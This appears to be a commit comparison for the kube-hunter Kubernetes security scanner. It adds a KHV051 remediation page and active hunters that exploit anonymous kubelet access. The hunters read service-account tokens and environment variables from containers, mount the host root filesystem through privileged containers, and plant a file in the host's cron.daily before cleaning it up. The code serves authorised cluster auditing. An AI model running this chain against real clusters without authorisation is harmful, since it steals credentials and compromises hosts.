mirror of
https://github.com/aquasecurity/kube-hunter.git
synced 2026-02-15 02:20:10 +00:00
Compare commits
4 Commits
add_plugin
...
issue-359
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
16ee0d87ce | ||
|
|
daf53cb484 | ||
|
|
d6ca666447 | ||
|
|
3ba926454a |
@@ -14,7 +14,7 @@ kube-hunter hunts for security weaknesses in Kubernetes clusters. The tool was d
|
||||
|
||||
**Explore vulnerabilities**: The kube-hunter knowledge base includes articles about discoverable vulnerabilities and issues. When kube-hunter reports an issue, it will show its VID (Vulnerability ID) so you can look it up in the KB at https://aquasecurity.github.io/kube-hunter/
|
||||
|
||||
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](kube_hunter/CONTRIBUTING.md).
|
||||
**Contribute**: We welcome contributions, especially new hunter modules that perform additional tests. If you would like to develop your modules please read [Guidelines For Developing Your First kube-hunter Module](https://github.com/aquasecurity/kube-hunter/blob/master/CONTRIBUTING.md).
|
||||
|
||||
[](https://youtu.be/s2-6rTkH8a8?t=57s)
|
||||
|
||||
|
||||
40
docs/_kb/KHV051.md
Normal file
40
docs/_kb/KHV051.md
Normal file
@@ -0,0 +1,40 @@
|
||||
---
|
||||
vid: KHV051
|
||||
title: Exposed Existing Privileged Containers Via Secure Kubelet Port
|
||||
categories: [Access Risk]
|
||||
---
|
||||
|
||||
# {{ page.vid }} - {{ page.title }}
|
||||
|
||||
## Issue description
|
||||
|
||||
The kubelet is configured to allow anonymous (unauthenticated) requests to its HTTPs API. This may expose certain information and capabilities to an attacker with access to the kubelet API.
|
||||
|
||||
A privileged container is given access to all devices on the host and can work at the kernel level. It is declared using the `Pod.spec.containers[].securityContext.privileged` attribute. This may be useful for infrastructure containers that perform setup work on the host, but is a dangerous attack vector.
|
||||
|
||||
Furthermore, if the kubelet **and** the API server authentication mechanisms are (mis)configured such that anonymous requests can execute commands via the API within the containers (specifically privileged ones), a malicious actor can leverage such capabilities to do way more damage in the cluster than expected: e.g. start/modify process on host.
|
||||
|
||||
## Remediation
|
||||
|
||||
Ensure kubelet is protected using `--anonymous-auth=false` kubelet flag. Allow only legitimate users using `--client-ca-file` or `--authentication-token-webhook` kubelet flags. This is usually done by the installer or cloud provider.
|
||||
|
||||
Minimize the use of privileged containers.
|
||||
|
||||
Use Pod Security Policies to enforce using `privileged: false` policy.
|
||||
|
||||
Review the RBAC permissions to Kubernetes API server for the anonymous and default service account, including bindings.
|
||||
|
||||
Ensure node(s) runs active filesystem monitoring.
|
||||
|
||||
Set `--insecure-port=0` and remove `--insecure-bind-address=0.0.0.0` in the Kubernetes API server config.
|
||||
|
||||
Remove `AlwaysAllow` from `--authorization-mode` in the Kubernetes API server config. Alternatively, set `--anonymous-auth=false` in the Kubernetes API server config; this will depend on the API server version running.
|
||||
|
||||
## References
|
||||
|
||||
- [Kubelet authentication/authorization](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet-authentication-authorization/)
|
||||
- [Privileged mode for pod containers](https://kubernetes.io/docs/concepts/workloads/pods/pod/#privileged-mode-for-pod-containers)
|
||||
- [Pod Security Policies - Privileged](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privileged)
|
||||
- [Using RBAC Authorization](https://kubernetes.io/docs/reference/access-authn-authz/rbac/)
|
||||
- [KHV005 - Access to Kubernetes API]({{ site.baseurl }}{% link _kb/KHV005.md %})
|
||||
- [KHV036 - Anonymous Authentication]({{ site.baseurl }}{% link _kb/KHV036.md %})
|
||||
@@ -81,6 +81,7 @@ class EtcdRemoteAccessActive(ActiveHunter):
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.write_evidence = ""
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_write_access(self):
|
||||
config = get_config()
|
||||
@@ -88,7 +89,7 @@ class EtcdRemoteAccessActive(ActiveHunter):
|
||||
data = {"value": "remotely written data"}
|
||||
try:
|
||||
r = requests.post(
|
||||
f"{self.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
|
||||
data=data,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
@@ -113,14 +114,16 @@ class EtcdRemoteAccess(Hunter):
|
||||
self.event = event
|
||||
self.version_evidence = ""
|
||||
self.keys_evidence = ""
|
||||
self.protocol = "https"
|
||||
self.event.protocol = "https"
|
||||
|
||||
def db_keys_disclosure(self):
|
||||
config = get_config()
|
||||
logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
|
||||
try:
|
||||
r = requests.get(
|
||||
f"{self.protocol}://{self.eventhost}:{ETCD_PORT}/v2/keys", verify=False, timeout=config.network_timeout,
|
||||
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
|
||||
verify=False,
|
||||
timeout=config.network_timeout,
|
||||
)
|
||||
self.keys_evidence = r.content if r.status_code == 200 and r.content != "" else False
|
||||
return self.keys_evidence
|
||||
|
||||
@@ -1,10 +1,12 @@
|
||||
import json
|
||||
import logging
|
||||
import time
|
||||
from enum import Enum
|
||||
|
||||
import re
|
||||
import requests
|
||||
import urllib3
|
||||
import uuid
|
||||
|
||||
from kube_hunter.conf import get_config
|
||||
from kube_hunter.core.events import handler
|
||||
@@ -119,6 +121,22 @@ class ExposedHealthzHandler(Vulnerability, Event):
|
||||
self.evidence = f"status: {self.status}"
|
||||
|
||||
|
||||
class ExposedExistingPrivilegedContainersViaSecureKubeletPort(Vulnerability, Event):
|
||||
"""A malicious actor, that has confirmed anonymous access to the API via the kubelet's secure port, \
|
||||
can leverage the existing privileged containers identified to damage the host and potentially \
|
||||
the whole cluster"""
|
||||
|
||||
def __init__(self, exposed_existing_privileged_containers):
|
||||
Vulnerability.__init__(
|
||||
self,
|
||||
component=KubernetesCluster,
|
||||
name="Exposed Existing Privileged Container(s) Via Secure Kubelet Port",
|
||||
category=AccessRisk,
|
||||
vid="KHV051",
|
||||
)
|
||||
self.exposed_existing_privileged_containers = exposed_existing_privileged_containers
|
||||
|
||||
|
||||
class PrivilegedContainers(Vulnerability, Event):
|
||||
"""A Privileged container exist on a node
|
||||
could expose the node/cluster to unwanted root operations"""
|
||||
@@ -244,7 +262,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
""" all methods will return the handler name if successful """
|
||||
|
||||
def __init__(self, path, pod, session=None):
|
||||
self.path = path
|
||||
self.path = path + ("/" if not path.endswith("/") else "")
|
||||
self.session = session if session else requests.Session()
|
||||
self.pod = pod
|
||||
|
||||
@@ -349,7 +367,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
# self.session.cert = self.event.client_cert
|
||||
# copy session to event
|
||||
self.event.session = self.session
|
||||
self.path = "https://{self.event.host}:10250"
|
||||
self.path = f"https://{self.event.host}:10250"
|
||||
self.kubehunter_pod = {
|
||||
"name": "kube-hunter",
|
||||
"namespace": "default",
|
||||
@@ -425,7 +443,7 @@ class SecureKubeletPortHunter(Hunter):
|
||||
pod_data = next(filter(is_kubesystem_pod, pods_data), None)
|
||||
|
||||
if pod_data:
|
||||
container_data = next(pod_data["spec"]["containers"], None)
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
return {
|
||||
"name": pod_data["metadata"]["name"],
|
||||
@@ -434,6 +452,520 @@ class SecureKubeletPortHunter(Hunter):
|
||||
}
|
||||
|
||||
|
||||
""" Active Hunters """
|
||||
|
||||
|
||||
@handler.subscribe(AnonymousAuthEnabled)
|
||||
class ProveAnonymousAuth(ActiveHunter):
|
||||
"""Foothold Via Secure Kubelet Port
|
||||
Attempts to demonstrate that a malicious actor can establish foothold into the cluster via a
|
||||
container abusing the configuration of the kubelet's secure port: authentication-auth=false.
|
||||
"""
|
||||
|
||||
def __init__(self, event):
|
||||
self.event = event
|
||||
self.base_url = "https://{host}:10250/".format(host=self.event.host)
|
||||
|
||||
def get_request(self, url, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.get(url=url, verify=verify, timeout=config.network_timeout).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
def post_request(self, url, params, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.post(
|
||||
url=url, verify=verify, params=params, timeout=config.network_timeout
|
||||
).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
@staticmethod
|
||||
def has_no_exception(result):
|
||||
return "Exception: " not in result
|
||||
|
||||
@staticmethod
|
||||
def has_no_error(result):
|
||||
possible_errors = ["exited with", "Operation not permitted", "Permission denied", "No such file or directory"]
|
||||
|
||||
return not any(error in result for error in possible_errors)
|
||||
|
||||
@staticmethod
|
||||
def has_no_error_nor_exception(result):
|
||||
return ProveAnonymousAuth.has_no_error(result) and ProveAnonymousAuth.has_no_exception(result)
|
||||
|
||||
def cat_command(self, run_request_url, full_file_path):
|
||||
return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)})
|
||||
|
||||
def process_container(self, run_request_url):
|
||||
service_account_token = self.cat_command(run_request_url, "/var/run/secrets/kubernetes.io/serviceaccount/token")
|
||||
|
||||
environment_variables = self.post_request(run_request_url, {"cmd": "env"})
|
||||
|
||||
if self.has_no_error_nor_exception(service_account_token):
|
||||
return {
|
||||
"result": True,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def execute(self):
|
||||
pods_raw = self.get_request(self.base_url + KubeletHandlers.PODS.value)
|
||||
|
||||
# At this point, the following must happen:
|
||||
# a) we get the data of the running pods
|
||||
# b) we get a forbidden message because the API server
|
||||
# has a configuration that denies anonymous attempts despite the kubelet being vulnerable
|
||||
|
||||
if self.has_no_error_nor_exception(pods_raw) and "items" in pods_raw:
|
||||
pods_data = json.loads(pods_raw)["items"]
|
||||
|
||||
temp_message = ""
|
||||
exposed_existing_privileged_containers = list()
|
||||
|
||||
for pod_data in pods_data:
|
||||
pod_namespace = pod_data["metadata"]["namespace"]
|
||||
pod_id = pod_data["metadata"]["name"]
|
||||
|
||||
for container_data in pod_data["spec"]["containers"]:
|
||||
container_name = container_data["name"]
|
||||
|
||||
run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name)
|
||||
|
||||
extracted_data = self.process_container(run_request_url)
|
||||
|
||||
if extracted_data["result"]:
|
||||
service_account_token = extracted_data["service_account_token"]
|
||||
environment_variables = extracted_data["environment_variables"]
|
||||
|
||||
temp_message += (
|
||||
"\n\nPod namespace: {}".format(pod_namespace)
|
||||
+ "\n\nPod ID: {}".format(pod_id)
|
||||
+ "\n\nContainer name: {}".format(container_name)
|
||||
+ "\n\nService account token: {}".format(service_account_token)
|
||||
+ "\nEnvironment variables: {}".format(environment_variables)
|
||||
)
|
||||
|
||||
first_check = container_data.get("securityContext", {}).get("privileged")
|
||||
|
||||
first_subset = container_data.get("securityContext", {})
|
||||
second_subset = first_subset.get("capabilities", {})
|
||||
data_for_second_check = second_subset.get("add", [])
|
||||
|
||||
second_check = "SYS_ADMIN" in data_for_second_check
|
||||
|
||||
if first_check or second_check:
|
||||
exposed_existing_privileged_containers.append(
|
||||
{
|
||||
"pod_namespace": pod_namespace,
|
||||
"pod_id": pod_id,
|
||||
"container_name": container_name,
|
||||
"service_account_token": service_account_token,
|
||||
"environment_variables": environment_variables,
|
||||
}
|
||||
)
|
||||
|
||||
if temp_message:
|
||||
message = "The following containers have been successfully breached." + temp_message
|
||||
|
||||
self.event.evidence = "{}".format(message)
|
||||
|
||||
if exposed_existing_privileged_containers:
|
||||
self.publish_event(
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort(
|
||||
exposed_existing_privileged_containers=exposed_existing_privileged_containers
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
@handler.subscribe(ExposedExistingPrivilegedContainersViaSecureKubeletPort)
|
||||
class MaliciousIntentViaSecureKubeletPort(ActiveHunter):
|
||||
"""Malicious Intent Via Secure Kubelet Port
|
||||
Attempts to demonstrate that a malicious actor can leverage existing privileged containers
|
||||
exposed via the kubelet's secure port, due to anonymous auth enabled misconfiguration,
|
||||
such that a process can be started or modified on the host.
|
||||
"""
|
||||
|
||||
def __init__(self, event, seconds_to_wait_for_os_command=1):
|
||||
self.event = event
|
||||
self.base_url = "https://{host}:10250/".format(host=self.event.host)
|
||||
self.seconds_to_wait_for_os_command = seconds_to_wait_for_os_command
|
||||
self.number_of_rm_attempts = 5
|
||||
self.number_of_rmdir_attempts = 5
|
||||
self.number_of_umount_attempts = 5
|
||||
|
||||
def post_request(self, url, params, verify=False):
|
||||
config = get_config()
|
||||
try:
|
||||
response_text = self.event.session.post(
|
||||
url, verify, params=params, timeout=config.network_timeout
|
||||
).text.rstrip()
|
||||
|
||||
return response_text
|
||||
except Exception as ex:
|
||||
logging.debug("Exception: " + str(ex))
|
||||
return "Exception: " + str(ex)
|
||||
|
||||
def cat_command(self, run_request_url, full_file_path):
|
||||
return self.post_request(run_request_url, {"cmd": "cat {}".format(full_file_path)})
|
||||
|
||||
def clean_attacked_exposed_existing_privileged_container(
|
||||
self,
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
file_created,
|
||||
number_of_rm_attempts,
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
):
|
||||
|
||||
self.rm_command(
|
||||
run_request_url,
|
||||
"{}/etc/cron.daily/{}".format(directory_created, file_created),
|
||||
number_of_rm_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.umount_command(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.rmdir_command(
|
||||
run_request_url, directory_created, number_of_rmdir_attempts, seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
def check_file_exists(self, run_request_url, file):
|
||||
file_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=file)
|
||||
|
||||
return ProveAnonymousAuth.has_no_error_nor_exception(file_exists)
|
||||
|
||||
def rm_command(self, run_request_url, file_to_remove, number_of_rm_attempts, seconds_to_wait_for_os_command):
|
||||
if self.check_file_exists(run_request_url, file_to_remove):
|
||||
for _ in range(number_of_rm_attempts):
|
||||
command_execution_outcome = self.post_request(
|
||||
run_request_url, {"cmd": "rm -f {}".format(file_to_remove)}
|
||||
)
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.check_file_exists(run_request_url, file_to_remove)
|
||||
|
||||
if first_check and not second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to remove file: "
|
||||
+ file_to_remove
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def chmod_command(self, run_request_url, permissions, file):
|
||||
return self.post_request(run_request_url, {"cmd": "chmod {} {}".format(permissions, file)})
|
||||
|
||||
def touch_command(self, run_request_url, file_to_create):
|
||||
return self.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)})
|
||||
|
||||
def attack_exposed_existing_privileged_container(
|
||||
self, run_request_url, directory_created, number_of_rm_attempts, seconds_to_wait_for_os_command, file_name=None
|
||||
):
|
||||
if file_name is None:
|
||||
file_name = "kube-hunter" + str(uuid.uuid1())
|
||||
|
||||
file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
|
||||
|
||||
file_created = self.touch_command(run_request_url, file_name_with_path)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(file_created):
|
||||
permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(permissions_changed):
|
||||
return {"result": True, "file_created": file_name}
|
||||
|
||||
self.rm_command(run_request_url, file_name_with_path, number_of_rm_attempts, seconds_to_wait_for_os_command)
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def check_directory_exists(self, run_request_url, directory):
|
||||
directory_exists = self.ls_command(run_request_url=run_request_url, file_or_directory=directory)
|
||||
|
||||
return ProveAnonymousAuth.has_no_error_nor_exception(directory_exists)
|
||||
|
||||
def rmdir_command(
|
||||
self, run_request_url, directory_to_remove, number_of_rmdir_attempts, seconds_to_wait_for_os_command,
|
||||
):
|
||||
if self.check_directory_exists(run_request_url, directory_to_remove):
|
||||
for _ in range(number_of_rmdir_attempts):
|
||||
command_execution_outcome = self.post_request(
|
||||
run_request_url, {"cmd": "rmdir {}".format(directory_to_remove)}
|
||||
)
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.check_directory_exists(run_request_url, directory_to_remove)
|
||||
|
||||
if first_check and not second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to remove directory: "
|
||||
+ directory_to_remove
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def ls_command(self, run_request_url, file_or_directory):
|
||||
return self.post_request(run_request_url, {"cmd": "ls {}".format(file_or_directory)})
|
||||
|
||||
def umount_command(
|
||||
self,
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
):
|
||||
# Note: the logic implemented proved more reliable than using "df"
|
||||
# command to resolve for mounted systems/partitions.
|
||||
current_files_and_directories = self.ls_command(run_request_url, directory)
|
||||
|
||||
if self.ls_command(run_request_url, directory) == current_files_and_directories:
|
||||
for _ in range(number_of_umount_attempts):
|
||||
# Ref: http://man7.org/linux/man-pages/man2/umount.2.html
|
||||
command_execution_outcome = self.post_request(
|
||||
run_request_url, {"cmd": "umount {} {}".format(file_system_or_partition, directory)}
|
||||
)
|
||||
|
||||
if seconds_to_wait_for_os_command:
|
||||
time.sleep(seconds_to_wait_for_os_command)
|
||||
|
||||
first_check = ProveAnonymousAuth.has_no_error_nor_exception(command_execution_outcome)
|
||||
second_check = self.ls_command(run_request_url, directory) != current_files_and_directories
|
||||
|
||||
if first_check and second_check:
|
||||
return True
|
||||
|
||||
pod_id = run_request_url.replace(self.base_url + "run/", "").split("/")[1]
|
||||
container_name = run_request_url.replace(self.base_url + "run/", "").split("/")[2]
|
||||
logger.warning(
|
||||
"kube-hunter: "
|
||||
+ "POD="
|
||||
+ pod_id
|
||||
+ ", "
|
||||
+ "CONTAINER="
|
||||
+ container_name
|
||||
+ " - Unable to unmount "
|
||||
+ file_system_or_partition
|
||||
+ " at: "
|
||||
+ directory
|
||||
)
|
||||
|
||||
return False
|
||||
|
||||
def mount_command(self, run_request_url, file_system_or_partition, directory):
|
||||
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
|
||||
return self.post_request(run_request_url, {"cmd": "mount {} {}".format(file_system_or_partition, directory)})
|
||||
|
||||
def mkdir_command(self, run_request_url, directory_to_create):
|
||||
# Ref: http://man7.org/linux/man-pages/man1/mkdir.1.html
|
||||
return self.post_request(run_request_url, {"cmd": "mkdir {}".format(directory_to_create)})
|
||||
|
||||
def findfs_command(self, run_request_url, file_system_or_partition_type, file_system_or_partition):
|
||||
# Ref: http://man7.org/linux/man-pages/man8/findfs.8.html
|
||||
return self.post_request(
|
||||
run_request_url, {"cmd": "findfs {}{}".format(file_system_or_partition_type, file_system_or_partition)}
|
||||
)
|
||||
|
||||
def get_root_values(self, command_line):
|
||||
for command in command_line.split(" "):
|
||||
# Check for variable-definition commands as there can be commands which don't define variables.
|
||||
if "=" in command:
|
||||
split = command.split("=")
|
||||
if split[0] == "root":
|
||||
if len(split) > 2:
|
||||
# Potential valid scenario: root=LABEL=example
|
||||
root_value_type = split[1] + "="
|
||||
root_value = split[2]
|
||||
|
||||
return root_value, root_value_type
|
||||
else:
|
||||
root_value_type = ""
|
||||
root_value = split[1]
|
||||
|
||||
return root_value, root_value_type
|
||||
|
||||
return None, None
|
||||
|
||||
def process_exposed_existing_privileged_container(
|
||||
self,
|
||||
run_request_url,
|
||||
number_of_umount_attempts,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
directory_to_create=None,
|
||||
):
|
||||
if directory_to_create is None:
|
||||
directory_to_create = "/kube-hunter_" + str(uuid.uuid1())
|
||||
|
||||
# /proc/cmdline - This file shows the parameters passed to the kernel at the time it is started.
|
||||
command_line = self.cat_command(run_request_url, "/proc/cmdline")
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(command_line):
|
||||
if len(command_line.split(" ")) > 0:
|
||||
root_value, root_value_type = self.get_root_values(command_line)
|
||||
|
||||
# Move forward only when the "root" variable value was actually defined.
|
||||
if root_value:
|
||||
if root_value_type:
|
||||
file_system_or_partition = self.findfs_command(run_request_url, root_value_type, root_value)
|
||||
else:
|
||||
file_system_or_partition = root_value
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(file_system_or_partition):
|
||||
directory_created = self.mkdir_command(run_request_url, directory_to_create)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(directory_created):
|
||||
directory_created = directory_to_create
|
||||
|
||||
mounted_file_system_or_partition = self.mount_command(
|
||||
run_request_url, file_system_or_partition, directory_created
|
||||
)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(mounted_file_system_or_partition):
|
||||
host_name = self.cat_command(
|
||||
run_request_url, "{}/etc/hostname".format(directory_created)
|
||||
)
|
||||
|
||||
if ProveAnonymousAuth.has_no_error_nor_exception(host_name):
|
||||
return {
|
||||
"result": True,
|
||||
"file_system_or_partition": file_system_or_partition,
|
||||
"directory_created": directory_created,
|
||||
}
|
||||
|
||||
self.umount_command(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
number_of_umount_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
self.rmdir_command(
|
||||
run_request_url,
|
||||
directory_created,
|
||||
number_of_rmdir_attempts,
|
||||
seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
return {"result": False}
|
||||
|
||||
def execute(self, directory_to_create=None, file_name=None):
|
||||
temp_message = ""
|
||||
|
||||
for exposed_existing_privileged_containers in self.event.exposed_existing_privileged_containers:
|
||||
pod_namespace = exposed_existing_privileged_containers["pod_namespace"]
|
||||
pod_id = exposed_existing_privileged_containers["pod_id"]
|
||||
container_name = exposed_existing_privileged_containers["container_name"]
|
||||
|
||||
run_request_url = self.base_url + "run/{}/{}/{}".format(pod_namespace, pod_id, container_name)
|
||||
|
||||
is_exposed_existing_privileged_container_privileged = self.process_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
self.number_of_umount_attempts,
|
||||
self.number_of_rmdir_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
directory_to_create,
|
||||
)
|
||||
|
||||
if is_exposed_existing_privileged_container_privileged["result"]:
|
||||
file_system_or_partition = is_exposed_existing_privileged_container_privileged[
|
||||
"file_system_or_partition"
|
||||
]
|
||||
directory_created = is_exposed_existing_privileged_container_privileged["directory_created"]
|
||||
|
||||
# Execute attack attempt: start/modify process in host.
|
||||
attack_successful_on_exposed_privileged_container = self.attack_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
directory_created,
|
||||
self.number_of_rm_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
file_name,
|
||||
)
|
||||
|
||||
if attack_successful_on_exposed_privileged_container["result"]:
|
||||
file_created = attack_successful_on_exposed_privileged_container["file_created"]
|
||||
|
||||
self.clean_attacked_exposed_existing_privileged_container(
|
||||
run_request_url,
|
||||
file_system_or_partition,
|
||||
directory_created,
|
||||
file_created,
|
||||
self.number_of_rm_attempts,
|
||||
self.number_of_umount_attempts,
|
||||
self.number_of_rmdir_attempts,
|
||||
self.seconds_to_wait_for_os_command,
|
||||
)
|
||||
|
||||
temp_message += "\n\nPod namespace: {}\n\nPod ID: {}\n\nContainer name: {}".format(
|
||||
pod_namespace, pod_id, container_name
|
||||
)
|
||||
|
||||
if temp_message:
|
||||
message = (
|
||||
"The following exposed existing privileged containers"
|
||||
+ " have been successfully abused by starting/modifying a process in the host."
|
||||
+ temp_message
|
||||
)
|
||||
|
||||
self.event.evidence = "{}".format(message)
|
||||
else:
|
||||
message = (
|
||||
"The following exposed existing privileged containers"
|
||||
+ " were not successfully abused by starting/modifying a process in the host."
|
||||
+ "Keep in mind that attackers might use other methods to attempt to abuse them."
|
||||
+ temp_message
|
||||
)
|
||||
|
||||
self.event.evidence = "{}".format(message)
|
||||
|
||||
|
||||
@handler.subscribe(ExposedRunHandler)
|
||||
class ProveRunHandler(ActiveHunter):
|
||||
"""Kubelet Run Hunter
|
||||
@@ -459,12 +991,12 @@ class ProveRunHandler(ActiveHunter):
|
||||
def execute(self):
|
||||
config = get_config()
|
||||
r = self.event.session.get(
|
||||
self.base_path + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
|
||||
f"{self.base_path}/" + KubeletHandlers.PODS.value, verify=False, timeout=config.network_timeout,
|
||||
)
|
||||
if "items" in r.text:
|
||||
pods_data = r.json()["items"]
|
||||
for pod_data in pods_data:
|
||||
container_data = next(pod_data["spec"]["containers"])
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
output = self.run(
|
||||
"uname -a",
|
||||
@@ -498,7 +1030,7 @@ class ProveContainerLogsHandler(ActiveHunter):
|
||||
if "items" in pods_raw:
|
||||
pods_data = json.loads(pods_raw)["items"]
|
||||
for pod_data in pods_data:
|
||||
container_data = next(pod_data["spec"]["containers"])
|
||||
container_data = pod_data["spec"]["containers"][0]
|
||||
if container_data:
|
||||
container_name = container_data["name"]
|
||||
output = requests.get(
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
|
||||
flake8
|
||||
pytest >= 2.9.1
|
||||
requests-mock
|
||||
requests-mock >= 1.8
|
||||
coverage < 5.0
|
||||
pytest-cov
|
||||
setuptools >= 30.3.0
|
||||
|
||||
@@ -28,11 +28,13 @@ from kube_hunter.modules.hunting.dashboard import KubeDashboard
|
||||
from kube_hunter.modules.hunting.dns import DnsSpoofHunter
|
||||
from kube_hunter.modules.hunting.etcd import EtcdRemoteAccess, EtcdRemoteAccessActive
|
||||
from kube_hunter.modules.hunting.kubelet import (
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
ProveContainerLogsHandler,
|
||||
ProveRunHandler,
|
||||
ProveSystemLogs,
|
||||
ReadOnlyKubeletPortHunter,
|
||||
SecureKubeletPortHunter,
|
||||
ProveRunHandler,
|
||||
ProveContainerLogsHandler,
|
||||
ProveSystemLogs,
|
||||
)
|
||||
from kube_hunter.modules.hunting.mounts import VarLogMountHunter, ProveVarLogMount
|
||||
from kube_hunter.modules.hunting.proxy import KubeProxy, ProveProxyExposed, K8sVersionDisclosureProve
|
||||
@@ -77,6 +79,8 @@ ACTIVE_HUNTERS = {
|
||||
ProveVarLogMount,
|
||||
ProveProxyExposed,
|
||||
K8sVersionDisclosureProve,
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
}
|
||||
|
||||
|
||||
|
||||
723
tests/hunting/test_kubelet.py
Normal file
723
tests/hunting/test_kubelet.py
Normal file
@@ -0,0 +1,723 @@
|
||||
import requests
|
||||
import requests_mock
|
||||
import urllib.parse
|
||||
import uuid
|
||||
|
||||
from kube_hunter.core.events import handler
|
||||
from kube_hunter.modules.hunting.kubelet import (
|
||||
AnonymousAuthEnabled,
|
||||
ExposedExistingPrivilegedContainersViaSecureKubeletPort,
|
||||
ProveAnonymousAuth,
|
||||
MaliciousIntentViaSecureKubeletPort,
|
||||
)
|
||||
|
||||
counter = 0
|
||||
pod_list_with_privileged_container = """{
|
||||
"kind": "PodList",
|
||||
"apiVersion": "v1",
|
||||
"metadata": {},
|
||||
"items": [
|
||||
{
|
||||
"metadata": {
|
||||
"name": "kube-hunter-privileged-deployment-86dc79f945-sjjps",
|
||||
"namespace": "kube-hunter-privileged"
|
||||
},
|
||||
"spec": {
|
||||
"containers": [
|
||||
{
|
||||
"name": "ubuntu",
|
||||
"securityContext": {
|
||||
{security_context_definition_to_test}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
"""
|
||||
service_account_token = "eyJhbGciOiJSUzI1NiIsImtpZCI6IlR0YmxoMXh..."
|
||||
env = """PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
|
||||
